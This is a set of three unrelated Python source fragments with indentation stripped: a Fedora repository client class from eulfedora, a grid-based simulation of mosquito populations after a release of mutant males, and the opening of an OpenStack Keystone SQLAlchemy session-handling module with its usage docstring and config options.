**FEDORA_CONNECTION_RETRIES**; if an iniitalization parameter is specified,
that will override the Django setting.
"""
default_object_type = DigitalObject
"Default type to use for methods that return fedora objects - :class:`DigitalObject`"
default_pidspace = None
#: default number of retries to request for API connections; see
#: http://docs.python-requests.org/en/master/api/#requests.adapters.HTTPAdapter
retries = 3
default_retry_option = object()
# default retry option, so None can be recognized as an option
search_fields = [
'pid', 'label', 'state', 'ownerId', 'cDate', 'mDate',
'dcmDate', 'title', 'creator', 'subject', 'description', 'publisher',
'contributor', 'date', 'type', 'format', 'identifier', 'source',
'language', 'relation', 'coverage', 'rights']
"fields that can be searched against in :meth:`find_objects`"
search_fields_aliases = {
'owner': 'ownerId',
'created': 'cDate',
'modified': 'mDate',
'dc_modified': 'dcmDate'
}
"human-readable aliases for oddly-named fedora search fields"
def __init__(self, root=None, username=None, password=None, request=None,
retries=default_retry_option):
# when initialized via django, settings should be pulled from django conf
if root is None:
try:
from django.conf import settings
from eulfedora import cryptutil
root = getattr(settings, 'FEDORA_ROOT', None)
if root is None:
raise Exception('Cannot initialize a Fedora connection without specifying ' +
'Fedora root url directly or in Django settings as FEDORA_ROOT')
# if username and password are not set, attempt to pull from django conf
if username is None and password is None:
if request is not None and request.user.is_authenticated and \
FEDORA_PASSWORD_SESSION_KEY in request.session:
username = request.user.username
password = cryptutil.decrypt(request.session[FEDORA_PASSWORD_SESSION_KEY])
if username is None and hasattr(settings, 'FEDORA_USER'):
username = settings.FEDORA_USER
if password is None and hasattr(settings, 'FEDORA_PASSWORD'):
password = settings.FEDORA_PASSWORD
if hasattr(settings, 'FEDORA_PIDSPACE'):
self.default_pidspace = settings.FEDORA_PIDSPACE
# if retries is specified in
if hasattr(settings, 'FEDORA_CONNECTION_RETRIES'):
self.retries = settings.FEDORA_CONNECTION_RETRIES
except ImportError:
pass
# if retries is specified in init options, that should override
# default value or django setting
if retries is not self.default_retry_option:
self.retries = retries
if root is None:
raise Exception('Could not determine Fedora root url from django settings or parameter')
logger.debug("Connecting to fedora at %s %s", root,
'as %s' % username if username
else '(no user credentials)')
self.api = ApiFacade(root, username, password)
self.fedora_root = self.api.base_url
self.username = username
self.password = password
self._risearch = None
@property
def risearch(self):
"instance of :class:`eulfedora.api.ResourceIndex`, with the same root url and credentials"
if self._risearch is None:
self._risearch = ResourceIndex(self.fedora_root, self.username, self.password)
return self._risearch
def get_next_pid(self, namespace=None, count=None):
"""
Request next available pid or pids from Fedora, optionally in a specified
namespace. Calls :meth:`ApiFacade.getNextPID`.
.. deprecated :: 0.14
Mint pids for new objects with
:func:`eulfedora.models.DigitalObject.get_default_pid`
instead, or call :meth:`ApiFacade.getNextPID` directly.
:param namespace: (optional) get the next pid in the specified pid namespace;
otherwise, Fedora will return the next pid in the configured default namespace.
:param count: (optional) get the specified number of pids; by default, returns 1 pid
:rtype: string or list of strings
"""
# this method should no longer be needed - default pid logic moved to DigitalObject
warnings.warn("""get_next_pid() method is deprecated; you should mint new pids via DigitalObject or ApiFacade.getNextPID() instead.""",
DeprecationWarning)
kwargs = {}
if namespace:
kwargs['namespace'] = namespace
elif self.default_pidspace:
kwargs['namespace'] = self.default_pidspace
if count:
kwargs['numPIDs'] = count
r = self.api.getNextPID(**kwargs)
nextpids = parse_xml_object(NewPids, r.content, r.url)
if count is None:
return nextpids.pids[0]
else:
return nextpids.pids
def ingest(self, text, log_message=None):
"""
Ingest a new object into Fedora. Returns the pid of the new object on
success. Calls :meth:`ApiFacade.ingest`.
:param text: full text content of the object to be ingested
:param log_message: optional log message
:rtype: string
"""
kwargs = {'text': text}
if log_message:
kwargs['logMessage'] = log_message
response = self.api.ingest(**kwargs)
return response.content
def purge_object(self, pid, log_message=None):
"""
Purge an object from Fedora. Calls :meth:`ApiFacade.purgeObject`.
:param pid: pid of the object to be purged
:param log_message: optional log message
:rtype: boolean
"""
kwargs = {'pid': pid}
if log_message:
kwargs['logMessage'] = log_message
response = self.api.purgeObject(**kwargs)
return response.status_code == requests.codes.ok
def get_objects_with_cmodel(self, cmodel_uri, type=None):
"""
Find objects in Fedora with the specified content model.
:param cmodel_uri: content model URI (should be full URI in info:fedora/pid:### format)
:param type: type of object to return (e.g., class:`DigitalObject`)
:rtype: list of objects
"""
uris = self.risearch.get_subjects(modelns.hasModel, cmodel_uri)
return [self.get_object(uri, type) for uri in uris]
def get_object(self, pid=None, type=None, create=None):
"""
Initialize a single object from Fedora, or create a new one, with the
same Fedora configuration and credentials.
:param pid: pid of the object to request, or a function that can be
called to get one. if not specified, :meth:`get_next_pid`
will be called if a pid is needed
:param type: type of object to return; defaults to :class:`DigitalObject`
:rtype: single object of the type specified
:create: boolean: create a new object? (if not specified, defaults
to False when pid is specified, and True when it is not)
"""
objtype = type or self.default_object_type
if pid is None:
if create is None:
create = True
else:
if create is None:
create = False
return objtype(self.api, pid, create,
default_pidspace=self.default_pidspace)
def infer_object_subtype(self, api, pid=None, create=False, default_pidspace=None):
"""Construct a DigitalObject or appropriate subclass, inferring the
appropriate subtype using :meth:`best_subtype_for_object`. Note that
this method signature has been selected to match the
:class:`~eulfedora.models.DigitalObject` constructor so that this
method might be passed directly to :meth:`get_object` as a `type`::
>>> obj = repo.get_object(pid, type=repo.infer_object_subtype)
See also: :class:`TypeInferringRepository`
"""
obj = DigitalObject(api, pid, create, default_pidspace)
if create:
return obj
if not obj.exists:
return obj
match_type = self.best_subtype_for_object(obj)
return match_type(api, pid)
def best_subtype_for_object(self, obj, content_models=None):
"""Given a :class:`~eulfedora.models.DigitalObject`, examine the
object to select the most appropriate subclass to instantiate. This
generic implementation examines the object's content models and
compares them against the defined subclasses of
:class:`~eulfedora.models.DigitalObject` to pick the best match.
Projects that have a more nuanced understanding of their particular
objects should override this method in a :class:`Repository`
subclass. This method is intended primarily for use by
:meth:`infer_object_subtype`.
:param obj: a :class:`~eulfedora.models.DigitalObject` to inspect
:param content_models: optional list of content models, if they are known
ahead of time (e.g., from a Solr search result), to avoid
an additional Fedora look-up
:rtype: a subclass of :class:`~eulfedora.models.DigitalObject`
"""
if content_models is None:
obj_models = set(str(m) for m in obj.get_models())
else:
obj_models = content_models
# go through registered DigitalObject subtypes looking for what type
# this object might be. use the first longest match: that is, look
# for classes we qualify for by having all of their cmodels, and use
# the class with the longest set of cmodels. if there's a tie, warn
# and pick one.
# TODO: store these at registration in a way that doesn't require
# this manual search every time
# TODO: eventually we want to handle the case where a DigitalObject
# can use multiple unrelated cmodels, though we need some major
# changes beyond here to support that
match_len, matches = 0, []
for obj_type in DigitalObject.defined_types.values():
type_model_list = getattr(obj_type, 'CONTENT_MODELS', None)
if not type_model_list:
continue
type_models = set(type_model_list)
if type_models.issubset(obj_models):
if len(type_models) > match_len:
match_len, matches = len(type_models), [obj_type]
elif len(type_models) == match_len:
matches.append(obj_type)
if not matches:
return DigitalObject
if len(matches) > 1:
# Check to see if there happens to be an end subclass to the list of matches.
for obj_type in matches:
is_root_subclass = True
for possible_parent_type in matches:
if not issubclass(obj_type, possible_parent_type):
is_root_subclass = False
if is_root_subclass:
return obj_type
logger.warn('%s has %d potential classes with no root subclass for the list. using the first: %s',
obj, len(matches), repr(matches))
return matches[0]
def find_objects(self, terms=None, type=None, chunksize=None, **kwargs):
"""
Find objects in Fedora. Find query should be generated via keyword
args, based on the fields in Fedora documentation. By default, the
query uses a contains (~) search for all search terms. Calls
:meth:`ApiFacade.findObjects`. Results seem to return consistently
in ascending PID order.
Example usage - search for all objects where the owner contains 'jdoe'::
repository.find_objects(ownerId='jdoe')
Supports all search operators provided by Fedora findObjects query (exact,
gt, gte, lt, lte, and contains). To specify the type of query for
a particular search term, call find_objects like this::
repository.find_objects(ownerId__exact='lskywalker')
repository.find_objects(date__gt='20010302')
:param type: type of objects to return; defaults to :class:`DigitalObject`
:param chunksize: number of objects to return at a time
:rtype: generator for list of objects
"""
type = type or self.default_object_type
find_opts = {'chunksize' : chunksize}
search_operators = {
'exact': '=',
'gt': '>',
'gte': '>=',
'lt': '<',
'lte': '<=',
'contains': '~'
}
if terms is not None:
find_opts['terms'] = terms
else:
conditions = []
for field, value in six.iteritems(kwargs):
if '__' in field:
field, filtr = field.split('__')
if filtr not in search_operators:
raise Exception("Unsupported search filter '%s'" % filtr)
op = search_operators[filtr]
else:
op = search_operators['contains'] # default search mode
if field in self.search_fields_aliases:
field = self.search_fields_aliases[field]
if field not in self.search_fields:
raise Exception("Error generating Fedora findObjects query: unknown search field '%s'" \
% field)
if ' ' in value:
# if value contains whitespace, it must be delimited with single quotes
value = "'%s'" % value
conditions.append("%s%s%s" % (field, op, value))
query = ' '.join(conditions)
find_opts['query'] = query
r = self.api.findObjects(**find_opts)
chunk = parse_xml_object(SearchResults, r.content, r.url)
while True:
for result in chunk.results:
yield type(self.api, result.pid)
if chunk.session_token:
r = self.api.findObjects(session_token=chunk.session_token, **find_opts)
chunk = parse_xml_object(SearchResults, r.content, r.url)
else:
break
class TypeInferringRepository(Repository):
"""A simple :class:`Repository` subclass whose default object type for
:meth:`~Repository.get_object` is
:meth:`~Repository.infer_object_subtype`. Thus, each call to
:meth:`~Repository.get_object` on a repository such as this will
automatically use :meth:`~Repository.best_subtype_for_object` (or a
subclass override) to infer the object's proper type.
"""
default_object_type = Repository.infer_object_subtype
# session key for storing a user password that will be used for Fedora access
# - used here and in eulcore.django.fedora.views
FEDORA_PASSWORD_SESSION_KEY = 'eulfedora_password'
| |
import random as rd
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
plt.style.use("ggplot")
from math import *
import numpy as np
import pickle as pkl
import skimage as ski
from skimage.color import rgb2gray
from scipy import misc
from PIL import Image
import PIL.ImageOps
from skimage.exposure import adjust_gamma
from randomwalkmaker import *
class Cell:
def __init__(self, pop_list, veg_type, veg_value, hum_value, iswater, pixelXmeters, poplim_perkm2, gmotype): #pop_list is array, veg_type is string, veg_value is the vegetation index value, hum_value is the humidity value
self.larvae_lim_per_box = poplim_perkm2*hum_value*(pixelXmeters**2)/1000000
self.pop_list = pop_list
self.veg_type = veg_type
self.veg_value = veg_value
self.hum_value = hum_value
self.iswater = iswater
self.gmotype = gmotype
self.e = pop_list[0] # e = eggs - aquatic steps
self.l = pop_list[1] # l = larvae - aquatic steps
self.p = pop_list[2] # p = pupae - aquatic steps
self.ah = pop_list[3] # ah = host-seeking adult - adult steps
self.ar = pop_list[4] # ar = resting adult - adult steps
self.ao = pop_list[5] # ao = ovoposition-seeking adult - adult steps
self.amale = sum(pop_list[3:])
self.emut = 0 #emut = mutant eggs
self.lmut = 0 #lmut = mutant larvae
self.pmut = 0 #pmut = mutant pupae
self.amut = 0 #amut = mutant adults
self.n_total = pop_list.sum()
self.n_aquatic = sum(pop_list[0:3])
self.n_adult = sum(pop_list[3:])
#U for dying P for passing
self.B = 100 #number of eggs per ovoposition
self.PE = .50 #prob of becoming a larvae
self.UE = .56 #prob of dying as a egg
self.novopo = 1.3 #novopositions per day #max =1.48, maxefficient=1.4
self.UL1 = .44 #prob of dying larvae
self.UL2 = .1 #prob of dying due to crowding
self.PL = 0.14 #prob of
self.PP = .50
self.UP = .37
self.PAH = .46
self.UAH = .18
self.PAR = .43
self.UAR = .0043
self.UAO = .41
self.PAO = .5
self.UAM = .15
def update(self):
a = 0; b =1
if self.l < self.larvae_lim_per_box: a = (1 - (self.l+ self.lmut)/self.larvae_lim_per_box)
allmale = self.amale + self.amut
if (self.amale + self.amut) != 0:
factor = (self.amale/allmale)
mutfactor = (1 - factor)
else: factor = 0; mutfactor = 0
deltae = self.PAO*self.B*self.novopo*self.ao*factor - self.e*self.UE - self.e*self.PE #egg value update
deltal = self.PE*self.e - self.l*self.UL1 - self.l*self.PL*a # larvae value update
deltap = self.PL*self.l*a - self.p*self.UP - self.p*self.PP #pupae update value
deltaah = self.PP*self.p/2 - self.ah*self.UAH - self.ah*self.PAH + self.PAO*self.ao #host-seeking update value
deltaar = self.PAH*self.ah - self.ar*self.UAR - self.ar*self.PAR #resting update value
deltaao = self.ar*self.PAR - self.PAO*self.ao - self.UAO*self.ao #ovoposition seeking update value
deltaamale = self.PP*self.p/2 - self.amale*self.UAM
deltaemut = self.PAO*self.B*self.novopo*self.ao*mutfactor - self.emut*self.UE - self.emut*self.PE #mutant egg value update
deltalmut = self.PE*self.emut - self.lmut*self.UL1 - self.lmut*self.PL*a*self.gmotype #mutant larvae value update
deltapmut = self.PL*self.lmut*a*self.gmotype - self.pmut*self.UP - self.pmut*self.PP #mutant pupae update value
deltaamut = self.PP*self.pmut - self.amut*self.UAM #mutant adult value update
self.pop_list = self.pop_list.tolist() #change from array to list as array is imutable in function
self.e += deltae # egg value update
self.l += deltal #larvae value update
self.p += deltap
self.ah += deltaah
self.ar += deltaar
self.ao += deltaao
self.amale += deltaamale
self.emut += deltaemut
self.lmut += deltalmut
self.pmut += deltapmut
self.amut += deltaamut
if self.e < 0 : self.e = 0
if self.l < 0 : self.l = 0
if self.p < 0 : self.p = 0
if self.ah < 0 : self.ah = 0
if self.ar < 0 : self.ar = 0
if self.ao < 0 : self.ao = 0
if self.amale < 0 : self.amale = 0
if self.emut < 0 : self.emut = 0
if self.lmut < 0 : self.lmut = 0
if self.pmut < 0 : self.pmut = 0
if self.amut < 0 : self.amut = 0
self.pop_list = np.array([self.e,self.l,self.p,self.ah,self.ar, self.ao])
self.n_total = self.pop_list.sum()
self.n_aquatic = sum(self.pop_list[0:3])
self.n_adult = sum(self.pop_list[3:])
class Grid:
def __init__(self, contour, vegimage, twiimage, cityimage, pixelXmeters, larvaelim, gmotype, eqsteps):
self.internalclock = 0
self.shape = contour.shape
self.contour = contour
self.vegimage = abs(vegimage-1)
self.twiimage = abs(twiimage-1)
self.cityimage = cityimage
self.pixelSize = pixelXmeters
self.history = []
#build the migration dictionaries
self.maxstep = MaxStep(pixelXmeters)
print("migration dt = "+ str(self.maxstep/60))
self.dict_matrix_to_num, self.dict_num_to_weights = weightDictmaker(self.maxstep, 10000,pixelXmeters)
#calculate stable popvalues
stable = Cell(np.array([100,100,100,100,100,100]),1,self.vegimage.mean(),self.twiimage.mean(),1, pixelXmeters, larvaelim, gmotype)
for i in range(300): stable.update()
print("initializing population with: ")
print(stable.pop_list)
#initializing grid of Cells
self.GRID = [[Cell(np.array(stable.pop_list)*abs(1-contour[j][i]), cityimage[j][i], vegimage[j][i], twiimage[j][i], contour[j][i], pixelXmeters, larvaelim, gmotype) for i in range(self.shape[1])] for j in range(self.shape[0])] #create grid of types of contour
print()
def neighbors_to_tuple(y,x):
return(int(contour[y-1,x-1]), int(contour[y,x-1]), int(contour[y+1,x-1]), int(contour[y-1,x]), int(contour[y+1,x]), int(contour[y-1,x+1]), int(contour[y,x+1]), int(contour[y+1,x+1]))
self.bordertype = [[self.dict_matrix_to_num[neighbors_to_tuple(j,i)] for i in range(1,self.shape[1]-1)] for j in range(1,self.shape[0]-1)]
self.bordertype = np.pad(self.bordertype, pad_width=((1,1),(1,1)), mode='constant', constant_values=-1) #padding with zeros
#equalize values
for i in range(eqsteps):
self.updateall()
self.internalclock = 0
self.history = []
print("equilized population")
print("equilized migration")
self.maxafem = self.getSingleGrid("adult").max()
self.maxmut = self.getSingleGrid("amut").max()
self.maxaqua = self.getSingleGrid("aqua").max() + self.getSingleGrid("aquamut").max()
def getSingleGrid(self, ending):
if ending == "e" : return np.array([[self.GRID[j][i].e for i in range(self.shape[1])] for j in range(self.shape[0])])
if ending == "l" : return np.array([[self.GRID[j][i].l for i in range(self.shape[1])] for j in range(self.shape[0])])
if ending == "p" : return np.array([[self.GRID[j][i].p for i in range(self.shape[1])] for j in range(self.shape[0])])
if ending == "ah" : return np.array([[self.GRID[j][i].ah for i in range(self.shape[1])] for j in range(self.shape[0])])
if ending == "ar" : return np.array([[self.GRID[j][i].ar for i in range(self.shape[1])] for j in range(self.shape[0])])
if ending == "ao" : return np.array([[self.GRID[j][i].ao for i in range(self.shape[1])] for j in range(self.shape[0])])
if ending == "aqua" : return self.getSingleGrid("e") + self.getSingleGrid("l") + self.getSingleGrid("p")
if ending == "adult": return self.getSingleGrid("ah") + self.getSingleGrid("ar")+ self.getSingleGrid("ao")
if ending == "all" : return self.getSingleGrid("aqua")+ self.getSingleGrid("adult")
if ending == "amale": return np.array([[self.GRID[j][i].amale for i in range(self.shape[1])] for j in range(self.shape[0])])
if ending == "amut" : return np.array([[self.GRID[j][i].amut for i in range(self.shape[1])] for j in range(self.shape[0])])
if ending == "aquamut": return np.array([[self.GRID[j][i].emut+self.GRID[j][i].lmut+self.GRID[j][i].pmut for i in range(self.shape[1])] for j in range(self.shape[0])])
print("wrong command on getSingleGrid"); return np.array([[]])
def grdsum(self, ending):
grid_to_sum = self.getSingleGrid(ending)
return grid_to_sum.sum()
def update_pop(self):
[[self.GRID[j][i].update() for i in range(self.shape[1])] for j in range(self.shape[0])]
def update_migration(self):
updatedah = np.zeros(self.shape)
updatedao = np.zeros(self.shape)
updatedamale = np.zeros(self.shape)
updatedamut = np.zeros(self.shape)
for i in range(1, self.shape[0]-1):
for j in range(1, self.shape[1]-1):
if self.GRID[i][j].iswater == 0:
borderMatrix = np.array(self.dict_num_to_weights[self.bordertype[i][j]])
floatingah = self.GRID[i][j].ah * borderMatrix * self.vegimage[i-1:i+2,j-1:j+2]
if floatingah.sum() > 0.05:
updatedah[i-1:i+2,j-1:j+2] += floatingah*(self.GRID[i][j].ah/floatingah.sum())
else: updatedah[i-1:i+2,j-1:j+2] += self.GRID[i][j].ah * borderMatrix
floatingao = self.GRID[i][j].ao * borderMatrix * self.twiimage[i-1:i+2,j-1:j+2]
if floatingao.sum() > 0.05:
updatedao[i-1:i+2,j-1:j+2] += floatingao*(self.GRID[i][j].ao/floatingao.sum())
else:updatedah[i-1:i+2,j-1:j+2] += self.GRID[i][j].ao * borderMatrix
updatedamale[i-1:i+2,j-1:j+2] += self.GRID[i][j].amale * borderMatrix
updatedamut[i-1:i+2,j-1:j+2] += self.GRID[i][j].amut * borderMatrix
for i in range(1, self.shape[0]-1):
for j in range(1, self.shape[1]-1):
self.GRID[i][j].ah = updatedah[i][j]
self.GRID[i][j].ao = updatedao[i][j]
self.GRID[i][j].amale = updatedamale[i][j]
self.GRID[i][j].amut = updatedamut[i][j]
def updateall(self):
for i in range(int(24*60/self.maxstep)):
self.update_migration()
self.update_pop()
self.internalclock += 1
self.history += [(self.grdsum("adult"),self.grdsum("amut") )]
def images(self):
f, (aquatics, ao, adults) = plt.subplots(ncols=3, figsize=(10,5)) # sharex=True, sharey=True
caq = aquatics.imshow(self.getSingleGrid('aqua') + self.getSingleGrid('aquamut'), cmap=plt.get_cmap("gist_earth"), vmin = 0, vmax = .8*self.maxaqua)
aquatics.set_title('Aquatics stages')
divider1 = make_axes_locatable(aquatics)
cax1 = divider1.append_axes("bottom", size="5%", pad=0.05)
f.colorbar(caq,cax1,orientation="horizontal") # a = int(self.grdsum("aqua") ,ticks = range(0, a, int(a/10)
cao=ao.imshow(self.getSingleGrid('amut'), cmap=plt.get_cmap("gist_earth"), vmin = 0, vmax = self.maxafem/.9)
ao.set_title('Mutant males')
divider3 = make_axes_locatable(ao)
cax3 = divider3.append_axes("bottom", size="5%", pad=0.05)
f.colorbar(cao,cax3, orientation="horizontal")
caa=adults.imshow(self.getSingleGrid('adult'), cmap=plt.get_cmap("gist_earth"), vmin = 0, vmax = self.maxafem)
adults.set_title('Adult females')
divider4 = make_axes_locatable(adults)
cax4 = divider4.append_axes("bottom", size="5%", pad=0.05)
f.colorbar(caa,cax4, orientation="horizontal")
f.subplots_adjust(hspace=0)
f.suptitle(str(self.internalclock)+" days after release", size = 17)
plt.setp([a.get_xticklabels() for a in f.axes[:-3]], visible=False)
plt.setp([a.get_yticklabels() for a in f.axes[:]], visible=False)
f.tight_layout()
f.subplots_adjust(top = 0.999)
plt.savefig("timelapse/timelapse-"+ '{0:03d}'.format(self.internalclock)+".png")
plt.close()
def graph(self):
femalehist, muthist = zip(*self.history)
f, (graph1) = plt.subplots(ncols=1)
graph1.plot(range(self.internalclock), femalehist , label = "females")
graph1.plot(range(self.internalclock), muthist , label = "mutants")
plt.xlabel('days after mutant release')
plt.ylabel('population size per square Km')
graph1.set_title('variation in population size ')
plt.legend(loc='best', prop={'size':10})
plt.savefig("timelapse/popsize_variation.png")
plt.close()
f, (graph2) = plt.subplots(ncols=1)
graph2.plot(range(self.internalclock), [femalehist[i]/(2*femalehist[i] + muthist[i]) for i in range(self.internalclock)], label = "females frequency")
graph2.plot( range(self.internalclock),[muthist[i]/(2*femalehist[i] + muthist[i]) for i in range(self.internalclock)], label = "mutant frequency")
plt.xlabel('days after mutant release')
plt.ylabel('percentages')
plt.ylim(0,1)
graph2.set_title('mutant and female percentages after release')
plt.legend(loc='best', prop={'size':10})
plt.savefig("timelapse/frequency_variation.png")
plt.close()
| |
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Session Handling for SQLAlchemy backend.
Initializing:
* Call set_defaults with the minimal of the following kwargs:
sql_connection, sqlite_db
Example::
session.set_defaults(
sql_connection="sqlite:///var/lib/keystone/sqlite.db",
sqlite_db="/var/lib/keystone/sqlite.db")
Recommended ways to use sessions within this framework:
* Don't use them explicitly; this is like running with AUTOCOMMIT=1.
model_query() will implicitly use a session when called without one
supplied. This is the ideal situation because it will allow queries
to be automatically retried if the database connection is interrupted.
Note: Automatic retry will be enabled in a future patch.
It is generally fine to issue several queries in a row like this. Even though
they may be run in separate transactions and/or separate sessions, each one
will see the data from the prior calls. If needed, undo- or rollback-like
functionality should be handled at a logical level. For an example, look at
the code around quotas and reservation_rollback().
Examples::
def get_foo(context, foo):
return (model_query(context, models.Foo).
filter_by(foo=foo).
first())
def update_foo(context, id, newfoo):
(model_query(context, models.Foo).
filter_by(id=id).
update({'foo': newfoo}))
def create_foo(context, values):
foo_ref = models.Foo()
foo_ref.update(values)
foo_ref.save()
return foo_ref
* Within the scope of a single method, keeping all the reads and writes within
the context managed by a single session. In this way, the session's __exit__
handler will take care of calling flush() and commit() for you.
If using this approach, you should not explicitly call flush() or commit().
Any error within the context of the session will cause the session to emit
a ROLLBACK. Database Errors like IntegrityError will be raised in
session's __exit__ handler, and any try/except within the context managed
by session will not be triggered. And catching other non-database errors in
the session will not trigger the ROLLBACK, so exception handlers should
always be outside the session, unless the developer wants to do a partial
commit on purpose. If the connection is dropped before this is possible,
the database will implicitly roll back the transaction.
Note: statements in the session scope will not be automatically retried.
If you create models within the session, they need to be added, but you
do not need to call model.save()
::
::
def create_many_foo(context, foos):
session = get_session()
with session.begin():
for foo in foos:
foo_ref = models.Foo()
foo_ref.update(foo)
session.add(foo_ref)
def update_bar(context, foo_id, newbar):
session = get_session()
with session.begin():
foo_ref = (model_query(context, models.Foo, session).
filter_by(id=foo_id).
first())
(model_query(context, models.Bar, session).
filter_by(id=foo_ref['bar_id']).
update({'bar': newbar}))
Note: update_bar is a trivially simple example of using "with session.begin".
Whereas create_many_foo is a good example of when a transaction is needed,
it is always best to use as few queries as possible. The two queries in
update_bar can be better expressed using a single query which avoids
the need for an explicit transaction. It can be expressed like so::
def update_bar(context, foo_id, newbar):
subq = (model_query(context, models.Foo.id).
filter_by(id=foo_id).
limit(1).
subquery())
(model_query(context, models.Bar).
filter_by(id=subq.as_scalar()).
update({'bar': newbar}))
For reference, this emits approximately the following SQL statement::
UPDATE bar SET bar = ${newbar}
WHERE id=(SELECT bar_id FROM foo WHERE id = ${foo_id} LIMIT 1);
Note: create_duplicate_foo is a trivially simple example of catching an
exception while using "with session.begin". Here create two duplicate
instances with same primary key, must catch the exception out of context
managed by a single session:
def create_duplicate_foo(context):
foo1 = models.Foo()
foo2 = models.Foo()
foo1.id = foo2.id = 1
session = get_session()
try:
with session.begin():
session.add(foo1)
session.add(foo2)
except exception.DBDuplicateEntry as e:
handle_error(e)
* Passing an active session between methods. Sessions should only be passed
to private methods. The private method must use a subtransaction; otherwise
SQLAlchemy will throw an error when you call session.begin() on an existing
transaction. Public methods should not accept a session parameter and should
not be involved in sessions within the caller's scope.
Note that this incurs more overhead in SQLAlchemy than the above means
due to nesting transactions, and it is not possible to implicitly retry
failed database operations when using this approach.
This also makes code somewhat more difficult to read and debug, because a
single database transaction spans more than one method. Error handling
becomes less clear in this situation. When this is needed for code clarity,
it should be clearly documented.
::
def myfunc(foo):
session = get_session()
with session.begin():
# do some database things
bar = _private_func(foo, session)
return bar
def _private_func(foo, session=None):
if not session:
session = get_session()
with session.begin(subtransaction=True):
# do some other database things
return bar
There are some things which it is best to avoid:
* Don't keep a transaction open any longer than necessary.
This means that your "with session.begin()" block should be as short
as possible, while still containing all the related calls for that
transaction.
* Avoid "with_lockmode('UPDATE')" when possible.
In MySQL/InnoDB, when a "SELECT ... FOR UPDATE" query does not match
any rows, it will take a gap-lock. This is a form of write-lock on the
"gap" where no rows exist, and prevents any other writes to that space.
This can effectively prevent any INSERT into a table by locking the gap
at the end of the index. Similar problems will occur if the SELECT FOR UPDATE
has an overly broad WHERE clause, or doesn't properly use an index.
One idea proposed at ODS Fall '12 was to use a normal SELECT to test the
number of rows matching a query, and if only one row is returned,
then issue the SELECT FOR UPDATE.
The better long-term solution is to use INSERT .. ON DUPLICATE KEY UPDATE.
However, this can not be done until the "deleted" columns are removed and
proper UNIQUE constraints are added to the tables.
Enabling soft deletes:
* To use/enable soft-deletes, the SoftDeleteMixin must be added
to your model class. For example::
class NovaBase(models.SoftDeleteMixin, models.ModelBase):
pass
Efficient use of soft deletes:
* There are two possible ways to mark a record as deleted::
model.soft_delete() and query.soft_delete().
model.soft_delete() method works with single already fetched entry.
query.soft_delete() makes only one db request for all entries that correspond
to query.
* In almost all cases you should use query.soft_delete(). Some examples::
def soft_delete_bar():
count = model_query(BarModel).find(some_condition).soft_delete()
if count == 0:
raise Exception("0 entries were soft deleted")
def complex_soft_delete_with_synchronization_bar(session=None):
if session is None:
session = get_session()
with session.begin(subtransactions=True):
count = (model_query(BarModel).
find(some_condition).
soft_delete(synchronize_session=True))
# Here synchronize_session is required, because we
# don't know what is going on in outer session.
if count == 0:
raise Exception("0 entries were soft deleted")
* There is only one situation where model.soft_delete() is appropriate: when
you fetch a single record, work with it, and mark it as deleted in the same
transaction.
::
def soft_delete_bar_model():
session = get_session()
with session.begin():
bar_ref = model_query(BarModel).find(some_condition).first()
# Work with bar_ref
bar_ref.soft_delete(session=session)
However, if you need to work with all entries that correspond to query and
then soft delete them you should use query.soft_delete() method::
def soft_delete_multi_models():
session = get_session()
with session.begin():
query = (model_query(BarModel, session=session).
find(some_condition))
model_refs = query.all()
# Work with model_refs
query.soft_delete(synchronize_session=False)
# synchronize_session=False should be set if there is no outer
# session and these entries are not used after this.
When working with many rows, it is very important to use query.soft_delete,
which issues a single query. Using model.soft_delete(), as in the following
example, is very inefficient.
::
for bar_ref in bar_refs:
bar_ref.soft_delete(session=session)
# This will produce count(bar_refs) db requests.
"""
import functools
import os.path
import re
import time
from oslo.config import cfg
import six
from sqlalchemy import exc as sqla_exc
from sqlalchemy.interfaces import PoolListener
import sqlalchemy.orm
from sqlalchemy.pool import NullPool, StaticPool
from sqlalchemy.sql.expression import literal_column
from keystone.openstack.common.db import exception
from keystone.openstack.common.gettextutils import _
from keystone.openstack.common import log as logging
from keystone.openstack.common import timeutils
sqlite_db_opts = [
cfg.StrOpt('sqlite_db',
default='keystone.sqlite',
help='the filename to use with sqlite'),
cfg.BoolOpt('sqlite_synchronous',
default=True,
help='If true, use synchronous mode for sqlite'),
]
database_opts = [
cfg.StrOpt('connection',
default='sqlite:///' +
os.path.abspath(os.path.join(os.path.dirname(__file__),
'../', '$sqlite_db')),
help='The SQLAlchemy connection string used to connect to the '
'database',
secret=True,
deprecated_opts=[cfg.DeprecatedOpt('sql_connection',
group='DEFAULT'),
cfg.DeprecatedOpt('sql_connection',
group='DATABASE'),
cfg.DeprecatedOpt('connection',
group='sql'), ]),
cfg.StrOpt('slave_connection',
default='',
secret=True,
help='The SQLAlchemy connection string used to connect to the '
'slave database'),
cfg.IntOpt('idle_timeout',
default=3600,
deprecated_opts=[cfg.DeprecatedOpt('sql_idle_timeout',
group='DEFAULT'),
cfg.DeprecatedOpt('sql_idle_timeout',
group='DATABASE'),
cfg.DeprecatedOpt('idle_timeout',
group='sql')],
help='timeout before idle sql connections are reaped'),
cfg.IntOpt('min_pool_size',
default=1,
deprecated_opts=[cfg.DeprecatedOpt('sql_min_pool_size',
group='DEFAULT'),
cfg.DeprecatedOpt('sql_min_pool_size',
group='DATABASE')],
help='Minimum number of SQL connections to keep open in a '
'pool'),
cfg.IntOpt('max_pool_size',
default=None,
deprecated_opts=[cfg.DeprecatedOpt('sql_max_pool_size',
group='DEFAULT'),
cfg.DeprecatedOpt('sql_max_pool_size',
group='DATABASE')],
help='Maximum number of SQL connections to keep open in a '
'pool'),
cfg.IntOpt('max_retries',
default=10,
deprecated_opts=[cfg.DeprecatedOpt('sql_max_retries',
group='DEFAULT'),
cfg.DeprecatedOpt('sql_max_retries',
group='DATABASE')],
help='maximum db connection retries during startup. '
'(setting -1 implies an infinite retry count)'),
cfg.IntOpt('retry_interval',
default=10,
deprecated_opts=[cfg.DeprecatedOpt('sql_retry_interval',
group='DEFAULT'),
cfg.DeprecatedOpt('reconnect_interval',
group='DATABASE')],
